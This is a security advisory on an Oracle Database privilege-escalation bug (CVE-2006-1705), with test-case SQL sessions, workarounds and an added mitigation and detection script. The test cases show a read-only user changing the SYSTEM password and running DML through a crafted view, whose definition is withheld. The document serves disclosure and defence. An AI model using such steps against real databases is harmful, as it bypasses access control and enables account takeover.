Oracle Exploit Code

Systems Affected : Oracle Database 9.1.0.0 - 10.2.0.3 (any platform)
Severity : High Risk (unpatched)
Category : Privilege Escalation
Vendor URL : http://www.oracle.com/
Author : Alexander Kornbrust (ak at red-database-security.com)
Date : 11 April 2006 (V 1.0.4)
Finder of this vulnerability : Dr. Christian Kleinewächter and Swen Thümmler from infinity3 GmbH
Oracle Bugno. : 7185031
CVE : CVE-2006-1705

Preface
Last Thursday, 6th April 2006, Oracle released a note on the Oracle 
knowledgebase Metalink with details about an unfixed security vulnerability 
(= 0day) and a working test case (= exploit code) which affects all versions of 
Oracle from 9.1.0.0 to 10.2.0.3. This note, "363848.1 - A User with SELECT 
Object Privilege on Base Tables Can Delete Rows from a View", was available last 
week to Metalink customers. The note was also displayed in the daily headlines 
section of Metalink and sent to subscribers of the daily headline section.

Because of this, the information can be assumed to be public knowledge, and 
DBAs/developers who missed the note on Metalink should know about this 
vulnerability in order to avoid or mitigate the risk (where possible) while 
waiting for a patch from Oracle.

After noticing the note, I informed Oracle secalert that releasing such 
information on Metalink is not a wise idea. Oracle normally criticises 
individuals and/or companies for releasing information about Oracle 
vulnerabilities (like David Litchfield from NGSSoftware for releasing 
information on a still unfixed bug in the mod_plsql gateway). In this case, not 
only did Oracle release detailed information on the vulnerability; they also 
included the working exploit code on Metalink.

In an interview, the Oracle CSO Mary Ann Davidson stated: “I’ve known 
customers to terminate contracts … for releasing exploit code… you might 
get applause from hackers… but business will not pay you to slit their 
throats. With knowledge comes responsibility.”

After my email, Oracle removed the note from Metalink.

Details
Oracle versions 9.1.0.0 to 10.2.0.3 contain an unpatched vulnerability which 
allows users with SELECT-only privileges on a base table to insert, update and 
delete data via a specially crafted view.

The impact can be huge and can eliminate the entire role concept, because 
well-designed applications normally have a read-only role for low-privilege 
users (e.g. reporting or external auditors). If these low-privileged users are 
able to create a view, which is standard in Oracle 9.1.x to 10g R1, they can 
also insert, update and delete data via a specially crafted view. Depending on 
the architecture of the application, it is possible to modify data, escalate 
privileges (e.g. change database passwords), ...

Patch Information
Currently there are no patches available. According to Oracle secalert, Oracle 
will provide patches in a future Critical Patch Update. 
Red-Database-Security is not convinced that the April 2006 CPU will contain 
patches against this vulnerability.

Test case 1 (without the view)
The user dbsnmp has only the privilege "SELECT ANY DICTIONARY" and normally 
cannot update tables in the data dictionary. Exploiting this bug allows the 
modification of the SYSTEM password:
C:\>sqlplus dbsnmp/dbsnmp

SQL*Plus: Release 10.1.0.4.0 - Production on Thu Apr 11 12:20:27 2006
Copyright (c) 1982, 2005, Oracle. All rights reserved.

Connected to:
Oracle Database 10g Enterprise Edition Release 10.1.0.4.0 - Production
With the Partitioning, OLAP and Data Mining options

SQL> select * from v$version;

BANNER
----------------------------------------------------------------
Oracle Database 10g Enterprise Edition Release 10.1.0.4.0 - Prod
PL/SQL Release 10.1.0.4.0 - Production
CORE    10.1.0.4.0      Production
TNS for 32-bit Windows: Version 10.1.0.4.0 - Production
NLSRTL Version 10.1.0.4.0 - Production

SQL> -- (as expected)
SQL> update sys.user$ set password='BC903FAEBB69EFBF' where name='SYSTEM';
update sys.user$ set password='BC903FAEBB69EFBF' where name='SYSTEM'
*
ERROR at line 1:
ORA-01031: insufficient privileges

SQL> -- create a (specially crafted) custom view
SQL> create or replace view e as select [...censored...];

View created.

SQL> -- Now we change the password of the user SYSTEM to ALEX
SQL> update e set password='BC903FAEBB69EFBF' where name ='SYSTEM';

1 row updated.

Test case 2 (without the view, from Jens)

set echo on
connect / as sysdba

-- owner of the base table: may create tables, nothing more
create user tableowner
identified by abcd123
default tablespace tools
quota unlimited on tools;

grant create session, create table to tableowner;

-- low-privilege user: may only log in and create views
create user readuser
identified by abcd123
default tablespace tools;

grant create session, create view to readuser;

connect tableowner/abcd123

-- base table with one row; readuser gets SELECT only (no INSERT/UPDATE/DELETE)
create table t1
(id number primary key);
insert into t1 values (1);
grant select on t1 to readuser;

connect readuser/abcd123

-- the specially crafted view (definition withheld by the advisory)
create view del_view as
[censored]

select * from del_view;

-- each of the following DML statements should fail with ORA-01031 on an
-- unaffected system, but succeeds on 9.1.0.0 - 10.2.0.3
delete from del_view;
commit;
select * from del_view;

insert into del_view values (1);
commit;
select * from del_view;

update del_view set id=99;
commit;
select * from del_view;

-- clean up
connect / as sysdba
drop user tableowner cascade;
drop user readuser cascade;
exit

Workarounds / Risk Mitigation
Sanitize the CONNECT role (9i - 10g R1) and remove the CREATE VIEW (and CREATE 
DATABASE LINK, ...) privileges from the CONNECT role, so that low-privileged 
users can no longer create views.

The Oracle Metalink note recommends creating views with the option "WITH CHECK 
OPTION". This recommendation helps against accidental modification through a 
view, but not against an attacker who creates the view himself.
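The following DBA script is an added example for the mitigation and detection side of this advisory; it is not part of the original advisory or of the Metalink note. It assumes Oracle's standard data dictionary and audit trail; the user and table names (TABLEOWNER, READUSER, T1) are the hypothetical ones from test case 2. Checking DML grants only through DBA_TAB_PRIVS is a simplification: grants received via roles are not considered.

```sql
-- Added example (not from the advisory). Run as a DBA, e.g. "connect / as sysdba".

-- 1. Mitigation: what does CONNECT grant on this instance?
--    (9i and 10g R1 include CREATE VIEW and CREATE DATABASE LINK; 10g R2 does not.)
select privilege
  from role_sys_privs
 where role = 'CONNECT'
 order by privilege;

-- Remove the privileges named in the workaround from the role ...
revoke create view, create database link from connect;

-- ... and list users/roles that still hold them directly.
select grantee, privilege, admin_option
  from dba_sys_privs
 where privilege in ('CREATE VIEW', 'CREATE DATABASE LINK')
   and grantee not in ('SYS', 'SYSTEM', 'DBA')
 order by grantee, privilege;

-- 2. Exposure: views whose owner has no INSERT/UPDATE/DELETE grant on a base
--    table owned by somebody else. Only such views can serve as a vehicle for
--    the bug; review each one (simplification: role-based grants are ignored).
select d.owner            as view_owner,
       d.name             as view_name,
       d.referenced_owner as table_owner,
       d.referenced_name  as base_table
  from dba_dependencies d
 where d.type            = 'VIEW'
   and d.referenced_type = 'TABLE'
   and d.referenced_owner <> d.owner
   and not exists (select 1
                     from dba_tab_privs p
                    where p.grantee    = d.owner
                      and p.owner      = d.referenced_owner
                      and p.table_name = d.referenced_name
                      and p.privilege in ('INSERT', 'UPDATE', 'DELETE'))
 order by view_owner, view_name;

-- 3. Detection: statement auditing records every DML and CREATE VIEW issued by
--    the read-only user, whether or not it goes through a view (AUDIT_TRAIL must
--    be enabled in the instance for records to be written).
audit insert table, update table, delete table by readuser by access;
audit create view by readuser by access;

-- Successful DML by READUSER that touched the base table T1.
select username, timestamp, action_name, owner, obj_name
  from dba_audit_trail
 where username = 'READUSER'
   and action_name in ('INSERT', 'UPDATE', 'DELETE')
   and returncode = 0
 order by timestamp;
```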

Credits
Special thanks to Jens Flasche who made Red-Database-Security aware of the 
Metalink note and for the first analysis + additional test cases.

Related bugs
In 2002 there was a similar bug in Oracle 9i Rel. 1: it was possible to 
escalate privileges via an ANSI outer join. It seems that Oracle introduced 
this bug with Oracle 9i Rel. 1.
